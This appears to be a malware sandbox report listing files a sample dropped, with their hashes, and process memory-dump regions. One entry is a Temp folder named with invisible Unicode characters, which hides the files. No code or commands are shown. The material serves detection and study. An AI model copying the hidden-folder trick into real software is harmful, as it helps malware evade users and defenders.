4c9ce8ea9531b67b22a7a65536ebc9a9ad68d0d231421f8ecc6cc2707dfcf9ea26551d4280140c8411f259b576cd14df1179e574ce0afb145149c3276695ccc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\AddDisconnect.docx

Filesize
17KB

MD5
a30fac656f5288594580c8a39bc12844

SHA1
f7b703b9b285aa48bb67bbee8c8f75bdca685da9

SHA256
0fc21a2addb9f28350641695f5ffcce860556ed34d9218f4815f36f0f32943d3

SHA512
1c204e277ae4399689a36812a45d921535239d5dc19612acbca1b901aae85321d916f31526a2600191e10373d871a5582e7010ecbf0d8ce011ebacba4943bc75

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\ClearLock.xlsx

Filesize
428KB

MD5
b498ba2e301b73acbb70dc10a1d8751b

SHA1
907a7c0e2beaf7038854393221544c5e40d0bac9

SHA256
c70a9a4896700bc880db2661046d1001c17a0561b8c0ca06bba729f4c06b8470

SHA512
9cdbca9b4bd088856e757b2e6b38f00472d57a912ba2bce3d0b9ecf6eafe3afb393959f8da5359be5cc8ad92804ce641074188580e6e0dc422ca11560954a6a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\CompareInstall.csv

Filesize
658KB

MD5
bead8514f09ecae695584a4f130050a8

SHA1
8675da48d4b6d910998a6bfb69c40f9597fd2ba3

SHA256
54464cbe3e43a30607e112096f1c4c3abf7b038e96832e11469acdfe56824ee1

SHA512
eb3cb67ee9df646c2a02906adf2be88b3f303712c56f60063fe51d6ca7ea8d7cd599e4ebbc5db87d2814e74942ea2c7960b02867295e67a0e033e8b940827624

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\ConvertFromShow.docx

Filesize
300KB

MD5
7d08668d240e14ab952c4208109250fe

SHA1
ebbe3a0c225a00b71bb72491332a05b18ba634b2

SHA256
53052309ea90e47f9c8c991e2967609b9bf2600555f70f2921780bc695bce416

SHA512
874b9693b88e5b37dc367f751ca6f462e23f960f4ec9083c3ff0744b3ff3706c99477d4a0040534e89c8b7b9af3054bf158f789853817a497719f9d5919b9ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\HideTrace.docx

Filesize
492KB

MD5
535bef2ada30e132e27d16372d63e773

SHA1
12bf16e05c30f00f3ae0d45910126995c35e4fd1

SHA256
71d47a8e7f9ec31e29e67ceb8f894d20893ee51d12a0754417f8e1f533c59de7

SHA512
7f96d8e007ff35d0ca07b4d8bc73acbd0849c96157d9442575e77a0a9be4d28e966856a07e7bf95c8b308598691fdf0aa8f191b8e642fec255c76260ce2355c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\OptimizeRepair.xlsx

Filesize
14KB

MD5
ea9685c30086fc7c5787746ba37fb7ff

SHA1
3303975ed1490b7635ff4bc89580759c46d688cc

SHA256
633cae70a00627387ad2a111decb4a89ac5505c30b93e2f78ba4a6eebdf1979e

SHA512
277f6a13bea4d06e4299e2f11c7d1bdfb0aa0bb9f46700629dc806547e4f525eee46b065a2a5b6590c19ca0dc533923fd54def6c797359069b07bba0251e8c69

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\PushShow.xlsx

Filesize
9KB

MD5
7ee9c448a3eab03068cbb87d8f10625d

SHA1
4f6e677dd9f4d373f0423b10d43de231f82d37ac

SHA256
d2112788584881df25882f0c7e95ed977d3338aae13d56a85959ce84d72bbaa9

SHA512
d2b5ddd6419a0f80008c456d7c4aeb92631cd885047d172d8b72933095378287e22251ce5dfc3697676154400f479c6f6557abf54d9c38966c63e006c6e8fdab

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\SelectPublish.csv

Filesize
262KB

MD5
4cc38ed62de97313d42aa00ac3114c15

SHA1
1aa7fd9c2cd60743766fc0e7b0184cbc57a41a14

SHA256
921bc58f7bbb2c95376a15898307c641773b18d12ecc678ca00bdc4dead15ed5

SHA512
f08112c5e723352d477167a64aff7e9047467f3c6fb330a98cef2fdf33cbb9b9bf1ab7be05687c29d5b5064352429e5ff13f7aea0ce07bbb3685c2bc99e59b1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\StepFormat.docx

Filesize
21KB

MD5
81a048f6f5a8cb375e83d729808b6017

SHA1
e05a31692b4295e1515f4a8e8b31d0a2f9ce4fda

SHA256
f839692f26d32b6c21c5bcf17ff7f7f38022717de9c9d607289471fb36599bb3

SHA512
44ff43db088f8f95ab7a38c6aa48191c2da0d82937ba259b4e5295e7c16a03e6d71621857ef13b17e0672bf9d3ef05146201b1d92e7556db57e5dee92ed7cb29

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‏ ‌ \Common Files\Documents\StopGroup.xls

Filesize
454KB

MD5
261a854a2e72feb60913a291a46e0b3d

SHA1
179f63d7be9e9073aec07ab1e4f6e04775d6d61a

SHA256
b488b09fe3d675ffd7f9d9f34afc7cce2f5421bf07451a0ac1558ad3400194bb

SHA512
9ffbb70cb11373df6ac28054a965cf5c7d4eea5d69519f2d3bcf2ad244893309adabd7944403fe811c9aec5379ba6ccce5ad1993de5f4dde668f1076346bfc4d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pslfzilm\CSCF8564695AFE54F83A87688BF9DC3EC41.TMP

Filesize
652B

MD5
0ecfe913f9335e8ba0a444172d44cdb0

SHA1
af183badde328fc71f8fc13ebe9a3a367b1dff8c

SHA256
3f6386824eee6ae4ce725272618aa9eff6f0fb745846eb793737f53b7d94b453

SHA512
f80d2fd367162dddd2072b53473b7beba48e0664aa870cb899b34b95b679c630eb90ba1413f0b8ed8bfb0133c0a73e25f992d14c3ae585c98a4dec910286852a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pslfzilm\pslfzilm.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pslfzilm\pslfzilm.cmdline

Filesize
607B

MD5
7093cd40a2bfdc8f1735344972360d7e

SHA1
f659c9e4769cd9b6331c6a39f69ae9a5c86f9cdd

SHA256
12e738373307c9cebd957eda965f9345a0e2c6638ceebaff8bf1a9001cd2fdf5

SHA512
62b5a5311c78306ac68cbe51edd9814c2e193bccd3a150e019a93edee4c10929a3459684d86f5f2d669861b978728b18b579925f32c58546a1adacaf5c6f96a4

Download Submit
memory/3580-83-0x000002B392700000-0x000002B392722000-memory.dmp

Filesize
136KB

Download
memory/3664-206-0x00000218DA800000-0x00000218DA808000-memory.dmp

Filesize
32KB

Download
memory/4808-30-0x00007FFD1BEA0000-0x00007FFD1BEC3000-memory.dmp

Filesize
140KB

Download
memory/4808-81-0x00007FFD21590000-0x00007FFD215A9000-memory.dmp

Filesize
100KB

Download
memory/4808-79-0x00007FFD1BB20000-0x00007FFD1BB2D000-memory.dmp

Filesize
52KB

Download
memory/4808-76-0x00007FFD1B7E0000-0x00007FFD1B7F4000-memory.dmp

Filesize
80KB

Download
memory/4808-78-0x00007FFD1BCC0000-0x00007FFD1BCED000-memory.dmp

Filesize
180KB

Download
memory/4808-70-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp

Filesize
5.9MB

Download
memory/4808-72-0x000002400CC90000-0x000002400D009000-memory.dmp

Filesize
3.5MB

Download
memory/4808-257-0x00007FFD1F740000-0x00007FFD1F759000-memory.dmp

Filesize
100KB

Download
memory/4808-73-0x00007FFD0BB80000-0x00007FFD0BEF9000-memory.dmp

Filesize
3.5MB

Download
memory/4808-272-0x00007FFD1BB80000-0x00007FFD1BBAE000-memory.dmp

Filesize
184KB

Download
memory/4808-74-0x00007FFD1BEA0000-0x00007FFD1BEC3000-memory.dmp

Filesize
140KB

Download
memory/4808-71-0x00007FFD1B350000-0x00007FFD1B408000-memory.dmp

Filesize
736KB

Download
memory/4808-66-0x00007FFD1BB80000-0x00007FFD1BBAE000-memory.dmp

Filesize
184KB

Download
memory/4808-64-0x00007FFD21850000-0x00007FFD2185D000-memory.dmp

Filesize
52KB

Download
memory/4808-62-0x00007FFD1F740000-0x00007FFD1F759000-memory.dmp

Filesize
100KB

Download
memory/4808-60-0x00007FFD0BF00000-0x00007FFD0C070000-memory.dmp

Filesize
1.4MB

Download
memory/4808-58-0x00007FFD1BBB0000-0x00007FFD1BBD3000-memory.dmp

Filesize
140KB

Download
memory/4808-56-0x00007FFD21590000-0x00007FFD215A9000-memory.dmp

Filesize
100KB

Download
memory/4808-54-0x00007FFD1BCC0000-0x00007FFD1BCED000-memory.dmp

Filesize
180KB

Download
memory/4808-82-0x00007FFD0B6F0000-0x00007FFD0B80C000-memory.dmp

Filesize
1.1MB

Download
memory/4808-48-0x00007FFD233E0000-0x00007FFD233EF000-memory.dmp

Filesize
60KB

Download
memory/4808-25-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp

Filesize
5.9MB

Download
memory/4808-115-0x00007FFD1BBB0000-0x00007FFD1BBD3000-memory.dmp

Filesize
140KB

Download
memory/4808-202-0x00007FFD0BF00000-0x00007FFD0C070000-memory.dmp

Filesize
1.4MB

Download
memory/4808-288-0x00007FFD1B350000-0x00007FFD1B408000-memory.dmp

Filesize
736KB

Download
memory/4808-289-0x000002400CC90000-0x000002400D009000-memory.dmp

Filesize
3.5MB

Download
memory/4808-291-0x00007FFD0BB80000-0x00007FFD0BEF9000-memory.dmp

Filesize
3.5MB

Download
memory/4808-293-0x00007FFD1BEA0000-0x00007FFD1BEC3000-memory.dmp

Filesize
140KB

Download
memory/4808-298-0x00007FFD0BF00000-0x00007FFD0C070000-memory.dmp

Filesize
1.4MB

Download
memory/4808-292-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp

Filesize
5.9MB

Download
memory/4808-327-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp

Filesize
5.9MB

Download
memory/4808-357-0x00007FFD0BB80000-0x00007FFD0BEF9000-memory.dmp

Filesize
3.5MB

Download
memory/4808-362-0x00007FFD1BBB0000-0x00007FFD1BBD3000-memory.dmp

Filesize
140KB

Download
memory/4808-370-0x00007FFD0B6F0000-0x00007FFD0B80C000-memory.dmp

Filesize
1.1MB

Download
memory/4808-369-0x00007FFD1BB20000-0x00007FFD1BB2D000-memory.dmp

Filesize
52KB

Download
memory/4808-368-0x00007FFD1B7E0000-0x00007FFD1B7F4000-memory.dmp

Filesize
80KB

Download
memory/4808-367-0x00007FFD1B350000-0x00007FFD1B408000-memory.dmp

Filesize
736KB

Download
memory/4808-366-0x00007FFD1BB80000-0x00007FFD1BBAE000-memory.dmp

Filesize
184KB

Download
memory/4808-365-0x00007FFD21850000-0x00007FFD2185D000-memory.dmp

Filesize
52KB

Download
memory/4808-364-0x00007FFD1F740000-0x00007FFD1F759000-memory.dmp

Filesize
100KB

Download
memory/4808-363-0x00007FFD0BF00000-0x00007FFD0C070000-memory.dmp

Filesize
1.4MB

Download
memory/4808-361-0x00007FFD21590000-0x00007FFD215A9000-memory.dmp

Filesize
100KB

Download
memory/4808-360-0x00007FFD1BCC0000-0x00007FFD1BCED000-memory.dmp

Filesize
180KB

Download
memory/4808-359-0x00007FFD233E0000-0x00007FFD233EF000-memory.dmp

Filesize
60KB

Download
memory/4808-358-0x00007FFD1BEA0000-0x00007FFD1BEC3000-memory.dmp

Filesize
140KB

Download
memory/4808-342-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp

Filesize
5.9MB

Download